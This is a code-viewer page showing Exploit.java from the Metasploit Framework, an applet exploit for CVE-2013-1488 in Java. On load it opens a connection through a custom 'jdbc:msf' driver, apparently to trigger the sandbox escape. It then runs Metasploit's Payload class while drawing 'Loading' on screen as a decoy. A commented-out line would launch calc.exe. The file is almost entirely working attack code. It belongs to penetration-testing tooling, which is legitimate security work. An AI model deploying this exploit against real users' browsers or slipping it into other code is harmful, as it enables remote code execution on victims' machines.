rapid7/metasploit-framework

View on GitHub
external/source/exploits/cve-2013-1488/Exploit.java

Summary

Maintainability
A
0 mins
Test Coverage
import java.applet.Applet;
import java.awt.Graphics;
import java.sql.*;
//import java.lang.Runtime;
import metasploit.Payload;

public class Exploit extends Applet
{

    public Exploit()
    {
    }

    public void init()
    {
        try
        {
            System.out.println("Here we go...");
            String url = "jdbc:msf:sql://127.0.0.1:8080/sample";
            String userid = "userid";
            String password = "password";
            Connection con = DriverManager.getConnection(url, userid, password); 
        }
        catch(Exception localThrowable)
        {
            //localThrowable.printStackTrace();
        }
        try {
            Payload.main(null);
            //Runtime.getRuntime().exec("calc.exe");
            
        } catch(Exception ex) {
            //ex.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}